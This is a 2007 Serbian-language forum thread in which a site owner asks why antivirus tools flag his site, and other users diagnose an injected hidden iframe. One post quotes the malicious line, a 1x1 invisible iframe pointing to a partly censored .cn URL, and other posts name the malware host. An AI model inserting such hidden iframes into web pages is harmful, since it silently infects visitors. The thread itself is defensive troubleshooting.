Obaveštenje o virusu na sajtu povremeno se javlja a svi tvrde da nema

[ ticma @ 16.11.2007. 23:05 ] @

Na sajtu www.piaggio.co.yu ponekad se javlja upozorenje da je virus
poruka izgleda ovako

Pregledao sam svoj kompletan racunar nema ni jedan virus. Zamolio sam Neobee gde je sajt na hostu da pregledaju na njihovom serveru i rekli su da nema ni tamo.
Na sajtu je sve "rucno" radjeno nema .exe programcica.
Obavestenje o virusu se javlja na vise antivirusnih prograna kasperski, NOD,

Ima li neko ideju sta bi moglo biti.
Sajt sam kompetno obrisao na serveru i ponovo kopirao, ali se to se ipak pojavi ponekad!
Ima li neke ideje??

evo ova kasperski nadje
detected: Trojan program Trojan-Downloader.JS.Psyme.ru URL: http://musicbox1.cn/neww/

_{[Ovu poruku je menjao ticma dana 17.11.2007. u 00:23 GMT+1]}

[ agasoft @ 17.11.2007. 00:57 ] @

Molio bih te ako možeš copy paste tekstom šta se tačno dešava?

[ yolja624 @ 17.11.2007. 07:56 ] @

provjeri php fajlove, narocito na kraju svakog php, dal se nalazi kakav java scrip u formi #$@FE@#%GE#@@GS^WSFW@ i slicno.
Evo sad sam ja bio na tom sajtu i avast je uredno prijavio:
"11/17/2007 8:54:44 AM SYSTEM 1700 Sign of "Win32:Agent-NHU [Trj]" has been found in "http://musicbox1.cn/neww/load.php" file. "

[ ticma @ 17.11.2007. 16:31 ] @

Citat:

agasoft: Molio bih te ako možeš copy paste tekstom šta se tačno dešava?

Pojavi mi se samo ono obavestenje od Kasperskog kad pristupim na sajt. Ne vidi se nikakav drugi problem.

Citat:

yolja624: provjeri php fajlove, narocito na kraju svakog php, dal se nalazi kakav java scrip u formi #$@FE@#%GE#@@GS^WSFW@ i slicno.
Evo sad sam ja bio na tom sajtu i avast je uredno prijavio:
"11/17/2007 8:54:44 AMSYSTEM1700Sign of "Win32:Agent-NHU [Trj]" has been found in "http://musicbox1.cn/neww/load.php" file. "

pregledao sam komplet index stranu ali nema nista sto lici na taj java skript. Jedino je java onaj reklamni deo od googla adsence-
Prikacio sam index stranu, pa ako neko zna gde je greska molio bih da me obrazuje, unapred se zahvaljujem!!

[ mulaz @ 17.11.2007. 17:43 ] @

kad otvorim sajt, i pogledam source, na 68oj liniji je

Code:
<body><iframe src='http://nessCENZURAen.cn/input.htm' width='1' height='1' style='visibility: hidden;'></iframe>

koji linkuje na onaj musicbox, na kome stoji pravi virus

znaci.. obrisi to

[ ticma @ 17.11.2007. 18:45 ] @

Vidi vraga, kad gledam na kompu toga nema, a na saju ima taj red.
Kako se to pojavi ako kopiram stalno index stranu preko stare?
Uglavnom, rucno sam obrisao i nadam se da je reseno.
Hvala puno!!

[ yolja624 @ 18.11.2007. 10:47 ] @

ma eto njega ponovo, vidjeces :D

[ ticma @ 18.11.2007. 11:05 ] @

Jel ima nekog nacina da se zastiti sajt od takvih upada?

[ agasoft @ 18.11.2007. 11:48 ] @

Ja mislim da je tu potpuna odgovornost na hosting kompaniji. Ja bre održavam
par sajtova i na ni jednom se ato ne dešava, a sigurno je hosting koji
koristimo jeftiniji sto trideset puta od Neobee, koji te pretpostavljam
dere...

[ ticma @ 18.11.2007. 12:42 ] @

I meni se to cini, najgore sto sam ih molio da ga pregledaju i nisu nasli, neki jaki strucnjaci
A cena je 1250 din za 10 MB na godinu dana!

[ Goran Mijailovic @ 18.11.2007. 13:21 ] @

Nod sada ne prijavljuje nista. Za sada je ok.

[ agasoft @ 18.11.2007. 16:25 ] @

Waw!!!!
Pa to je stvarno... ma dranje je mala reč za to... Deset megabajta za
hiljadu dvesta pedeset dinara!!!
Ja imam jedan hosting za sto devetnaest dolara petsto gigabajta godišnje!!!

[ ticma @ 18.11.2007. 17:07 ] @

a EUNET je jos bolji
aktiviranje 730 din -
mesecni zakup 365 din
godisnje 3.723 din (u cenu je uključeno 15% popusta)
za 20 MB

ako moze na PP gde taj hosting kako se registruje i ima li jos mesta

[ Milan Gligorijevic @ 18.11.2007. 18:43 ] @

Postoji forum Hosting => http://www.elitesecurity.org/f210-Hosting
Tamo nastavite diskusiju, a prvobitan problem ove teme je rešen.

Lock.